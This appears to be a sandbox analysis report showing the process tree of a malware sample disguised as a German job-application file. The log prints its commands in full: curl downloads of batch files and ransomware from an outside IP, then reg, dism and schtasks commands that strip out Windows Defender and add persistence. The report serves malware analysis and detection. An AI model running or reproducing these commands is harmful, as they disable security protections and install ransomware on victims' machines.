PID 3444 wrote to memory of 228	3444	cmd.exe	104
PID 3444 wrote to memory of 228	3444	cmd.exe	104
PID 1424 wrote to memory of 1740	1424	cmd.exe	107
PID 1424 wrote to memory of 1740	1424	cmd.exe	107
PID 2708 wrote to memory of 4276	2708	cmd.exe	106
PID 2708 wrote to memory of 4276	2708	cmd.exe	106
PID 4100 wrote to memory of 3388	4100	cmd.exe	110
PID 4100 wrote to memory of 3388	4100	cmd.exe	110
PID 228 wrote to memory of 3116	228	cmd.exe	111
PID 228 wrote to memory of 3116	228	cmd.exe	111
PID 4544 wrote to memory of 2664	4544	cmd.exe	113
PID 4544 wrote to memory of 2664	4544	cmd.exe	113
PID 1740 wrote to memory of 1220	1740	cmd.exe	118
PID 1740 wrote to memory of 1220	1740	cmd.exe	118
PID 4276 wrote to memory of 4892	4276	cmd.exe	114
PID 4276 wrote to memory of 4892	4276	cmd.exe	114
PID 2148 wrote to memory of 1800	2148	cmd.exe	116
PID 2148 wrote to memory of 1800	2148	cmd.exe	116
PID 3388 wrote to memory of 800	3388	cmd.exe	119
PID 3388 wrote to memory of 800	3388	cmd.exe	119
PID 2664 wrote to memory of 1796	2664	cmd.exe	120
PID 2664 wrote to memory of 1796	2664	cmd.exe	120
PID 1800 wrote to memory of 2600	1800	cmd.exe	122
PID 1800 wrote to memory of 2600	1800	cmd.exe	122
PID 1740 wrote to memory of 4140	1740	cmd.exe	123
PID 1740 wrote to memory of 4140	1740	cmd.exe	123
PID 4140 wrote to memory of 2004	4140	cmd.exe	124
PID 4140 wrote to memory of 2004	4140	cmd.exe	124
PID 4276 wrote to memory of 4292	4276	cmd.exe	126

C:\Users\Admin\AppData\Local\Temp\Sandra-Wohl-Bewerbung-Arbeitszeugnis.exe
"C:\Users\Admin\AppData\Local\Temp\Sandra-Wohl-Bewerbung-Arbeitszeugnis.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3628
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\63DF.tmp\63F0.tmp\63F1.bat C:\Users\Admin\AppData\Local\Temp\Sandra-Wohl-Bewerbung-Arbeitszeugnis.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4964
- - C:\Users\Admin\AppData\Local\Temp\Sandra-Wohl-Bewerbung-Arbeitszeugnis.exe
    "C:\Users\Admin\AppData\Local\Temp\Sandra-Wohl-Bewerbung-Arbeitszeugnis.exe" MY_FLAG
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3440
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\649B.tmp\649C.tmp\64AC.bat C:\Users\Admin\AppData\Local\Temp\Sandra-Wohl-Bewerbung-Arbeitszeugnis.exe MY_FLAG"
      4⤵
      Drops startup file
      Suspicious use of WriteProcessMemory
      PID:4544
    - - C:\Windows\system32\curl.exe
        
        curl http://111.90.151.174:7777/hit.bat -O
        5⤵
        
        PID:3036
    - - C:\Windows\system32\curl.exe
        
        curl http://111.90.151.174:7777/and.bat -O
        5⤵
        
        PID:808
    - - C:\Windows\system32\curl.exe
        
        curl http://111.90.151.174:7777/run.bat -O
        5⤵
        
        PID:5092
    - - C:\Windows\system32\curl.exe
        
        curl http://111.90.151.174:7777/5201.bat -O
        5⤵
        
        PID:5068
    - - C:\Windows\system32\curl.exe
        
        curl http://111.90.151.174:7777/kill.bat -O
        5⤵
        
        PID:4688
    - - C:\Windows\system32\curl.exe
        
        curl http://111.90.151.174:7777/part1.bat -O
        5⤵
        
        PID:4736
    - - C:\Windows\system32\curl.exe
        
        curl http://111.90.151.174:7777/part2.bat -O
        5⤵
        
        PID:4628
    - - C:\Windows\system32\curl.exe
        
        curl http://111.90.151.174:7777/part3.bat -O
        5⤵
        
        PID:2180
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM explorer.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1696
    - - C:\Windows\system32\cmd.exe
        
        cmd.exe /k "C:\configuration\5201.bat"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3444
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\configuration\5201.bat" MY_FLAG
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:228
        
        C:\Windows\system32\curl.exe
        
        curl http://111.90.151.174:7777/5201.exe -O
        7⤵
        
        PID:3116
        
        C:\configuration\5201.exe
        
        5201.exe
        7⤵
        Executes dropped EXE
        Drops startup file
        Adds Run key to start application
        NTFS ADS
        
        PID:4184
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Add-MpPreference -ExclusionPath C:\
        8⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3800
        
        C:\Users\Admin\Documents\images.exe
        
        "C:\Users\Admin\Documents\images.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2696
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Add-MpPreference -ExclusionPath C:\
        9⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1432
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe"
        9⤵
        
        PID:4676
    - - C:\Windows\system32\cmd.exe
        
        cmd.exe /k "C:\configuration\and.bat"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4100
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\configuration\and.bat" MY_FLAG
        6⤵
        Drops startup file
        Suspicious use of WriteProcessMemory
        
        PID:3388
        
        C:\Windows\system32\cacls.exe
        
        "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
        7⤵
        
        PID:800
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKEY_CLASSES_ROOT\CLSID\{5FDD51E2-A9D0-44CE-8C8D-162BA0C591A0}" /v "Version"
        7⤵
        
        PID:536
        
        C:\Windows\system32\reg.exe
        
        reg query "HKEY_CLASSES_ROOT\CLSID\{5FDD51E2-A9D0-44CE-8C8D-162BA0C591A0}" /v "Version"
        8⤵
        
        PID:1020
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\InboxApplications\Microsoft.Windows.SecHealthUI_10.0.19041.1165_neutral_neutral_cw5n1h2txyewy" /f
        7⤵
        
        PID:5088
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers\EPP" /f
        7⤵
        
        PID:3896
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CLASSES_ROOT\Directory\shellex\ContextMenuHandlers\EPP" /f
        7⤵
        
        PID:1840
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CLASSES_ROOT\Drive\shellex\ContextMenuHandlers\EPP" /f
        7⤵
        
        PID:4880
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-AM-Default-Definitions-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:4856
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-AppLayer-Group-amcore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:532
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-AppLayer-Group-onecore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:1828
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-AppLayer-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:4720
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-ApplicationGuard-Inbox-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:4736
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Client-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:2820
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-CloudClean-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:3700
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Core-Group-amcore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:4988
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Core-Group-onecore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:740
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:208
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Group-Policy-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:3692
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Management-Group-amcore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:5064
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Management-Group-onecore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:348
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Management-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:4308
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Management-MDM-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:4472
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Management-Powershell-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:4120
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Nis-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:4192
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Shield-Provider-Core-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:3424
        
        C:\Windows\system32\Dism.exe
        
        dism /online /remove-package /packagename:Windows-Defender-AM-Default-Definitions-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4284
        
        C:\Users\Admin\AppData\Local\Temp\5191A999-7603-4F18-8C64-515FE274E3DA\dismhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\5191A999-7603-4F18-8C64-515FE274E3DA\dismhost.exe {1E6BEC90-D78B-433C-BFD8-2BAA38AB66BE}
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Windows directory
        
        PID:3536
        
        C:\Windows\system32\Dism.exe
        
        dism /online /remove-package /packagename:Windows-Defender-AppLayer-Group-amcore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1260
        
        C:\Users\Admin\AppData\Local\Temp\D775BEEC-E3C5-45DE-8898-D4E5101BE190\dismhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\D775BEEC-E3C5-45DE-8898-D4E5101BE190\dismhost.exe {59B32099-39E4-41A7-A808-3E7AC47FA294}
        8⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:8
        
        C:\Windows\system32\Dism.exe
        
        dism /online /remove-package /packagename:Windows-Defender-AppLayer-Group-onecore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1104
        
        C:\Users\Admin\AppData\Local\Temp\23370D9A-4D38-45EC-827F-0AC19EDD8EE3\dismhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\23370D9A-4D38-45EC-827F-0AC19EDD8EE3\dismhost.exe {025AD824-CF33-4431-810C-145D66835C2E}
        8⤵
        Executes dropped EXE
        
        PID:2260
        
        C:\Windows\system32\Dism.exe
        
        dism /online /remove-package /packagename:Windows-Defender-AppLayer-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
        7⤵
        Drops file in Windows directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:4664
        
        C:\Users\Admin\AppData\Local\Temp\C8E0796E-9061-47E8-82F3-6CB6AF62FE96\dismhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\C8E0796E-9061-47E8-82F3-6CB6AF62FE96\dismhost.exe {37A55743-E3FA-439E-8A89-E0A0729701E9}
        8⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:2820
        
        C:\Windows\system32\Dism.exe
        
        dism /online /remove-package /packagename:Windows-Defender-ApplicationGuard-Inbox-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3292
        
        C:\Users\Admin\AppData\Local\Temp\5CE205E1-4231-4663-A041-D2EA53C5CEE1\dismhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\5CE205E1-4231-4663-A041-D2EA53C5CEE1\dismhost.exe {4E2B7C3A-FDC6-490D-914F-FAA7D416C1C4}
        8⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:4136
        
        C:\Windows\system32\Dism.exe
        
        dism /online /remove-package /packagename:Windows-Defender-Client-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
        7⤵
        Drops file in Windows directory
        
        PID:4192
        
        C:\Users\Admin\AppData\Local\Temp\E041A861-D90F-4161-8967-CE6EFA3BD76D\dismhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\E041A861-D90F-4161-8967-CE6EFA3BD76D\dismhost.exe {7ED110DA-E148-40F5-9C59-E44181F43A80}
        8⤵
        Executes dropped EXE
        
        PID:2760
        
        C:\Windows\system32\Dism.exe
        
        dism /online /remove-package /packagename:Windows-Defender-Group-Policy-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
        7⤵
        
        PID:4420
        
        C:\Users\Admin\AppData\Local\Temp\6E0D7D39-FC20-406D-AC93-A2A099C24B8B\dismhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\6E0D7D39-FC20-406D-AC93-A2A099C24B8B\dismhost.exe {F17C3C42-067E-4395-98EF-2919AAF3EE70}
        8⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:2544
        
        C:\Windows\system32\Dism.exe
        
        dism /online /remove-package /packagename:Windows-Shield-Provider-Core-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
        7⤵
        Drops file in Windows directory
        
        PID:4384
        
        C:\Users\Admin\AppData\Local\Temp\972018D8-5DE5-4C8A-8198-0B1CDA4A30BF\dismhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\972018D8-5DE5-4C8A-8198-0B1CDA4A30BF\dismhost.exe {159209D1-0709-420B-9D26-4F94E2095CB6}
        8⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:1264
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\MRT" /v DontOfferThroughWUAU /t REG_DWORD /d 1 /f
        7⤵
        
        PID:2156
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "SettingsPageVisibility" /t REG_SZ /d "hide:windowsdefender" /f
        7⤵
        
        PID:2492
        
        C:\Windows\system32\cmd.exe
        
        cmd.exe /k "C:\configuration\kill.bat"
        7⤵
        
        PID:2664
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\configuration\kill.bat" MY_FLAG
        8⤵
        
        PID:1252
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
        9⤵
        Modifies Windows Defender Real-time Protection settings
        
        PID:2088
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
        9⤵
        
        PID:736
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
        9⤵
        
        PID:2196
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
        9⤵
        
        PID:1084
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
        9⤵
        Modifies Windows Defender Real-time Protection settings
        
        PID:920
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
        9⤵
        Modifies Windows Defender Real-time Protection settings
        
        PID:2812
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
        9⤵
        Modifies Windows Defender Real-time Protection settings
        
        PID:3492
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
        9⤵
        Modifies Windows Defender Real-time Protection settings
        
        PID:2444
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
        9⤵
        Modifies Windows Defender Real-time Protection settings
        
        PID:4872
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
        9⤵
        
        PID:1144
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
        9⤵
        
        PID:3944
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
        9⤵
        
        PID:3244
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
        9⤵
        
        PID:3696
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
        9⤵
        
        PID:3396
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
        9⤵
        
        PID:3240
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
        9⤵
        
        PID:4876
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
        9⤵
        
        PID:2456
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
        9⤵
        
        PID:5088
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
        9⤵
        
        PID:4672
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
        9⤵
        
        PID:3432
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
        9⤵
        
        PID:368
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
        9⤵
        
        PID:4744
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
        9⤵
        
        PID:2992
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
        9⤵
        
        PID:2384
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
        9⤵
        
        PID:1264
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
        9⤵
        
        PID:3852
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
        9⤵
        
        PID:3440
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
        9⤵
        
        PID:4464
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
        9⤵
        
        PID:4456
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
        9⤵
        Modifies security service
        
        PID:3380
        
        C:\Windows\system32\cmd.exe
        
        cmd.exe /k C:\configuration\run.bat
        9⤵
        
        PID:4856
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\configuration\run.bat" MY_FLAG
        10⤵
        
        PID:4408
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        11⤵
        
        PID:4868
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo j "
        11⤵
        
        PID:3836
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1
        11⤵
        
        PID:4744
        
        C:\Windows\system32\curl.exe
        
        curl http://111.90.151.174:7777/Ransomware.exe -O
        7⤵
        
        PID:4176
    - - C:\Windows\system32\cmd.exe
        
        cmd.exe /k "C:\configuration\and.bat"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1424
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\configuration\and.bat" MY_FLAG
        6⤵
        Drops startup file
        Suspicious use of WriteProcessMemory
        
        PID:1740
        
        C:\Windows\system32\cacls.exe
        
        "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
        7⤵
        
        PID:1220
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKEY_CLASSES_ROOT\CLSID\{5FDD51E2-A9D0-44CE-8C8D-162BA0C591A0}" /v "Version"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:4140
        
        C:\Windows\system32\reg.exe
        
        reg query "HKEY_CLASSES_ROOT\CLSID\{5FDD51E2-A9D0-44CE-8C8D-162BA0C591A0}" /v "Version"
        8⤵
        
        PID:2004
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\InboxApplications\Microsoft.Windows.SecHealthUI_10.0.19041.1165_neutral_neutral_cw5n1h2txyewy" /f
        7⤵
        
        PID:4012
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers\EPP" /f
        7⤵
        
        PID:4236
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CLASSES_ROOT\Directory\shellex\ContextMenuHandlers\EPP" /f
        7⤵
        
        PID:2452
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_CLASSES_ROOT\Drive\shellex\ContextMenuHandlers\EPP" /f
        7⤵
        
        PID:3468
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-AM-Default-Definitions-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:4628
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-AppLayer-Group-amcore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:4700
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-AppLayer-Group-onecore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:3688
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-AppLayer-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:3368
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-ApplicationGuard-Inbox-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:2812
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Client-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:3032
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-CloudClean-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:3780
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Core-Group-amcore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:3620
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Core-Group-onecore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:4588
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
        7⤵
        
        PID:3376
        
        C:\Windows\system32\reg.exe
        
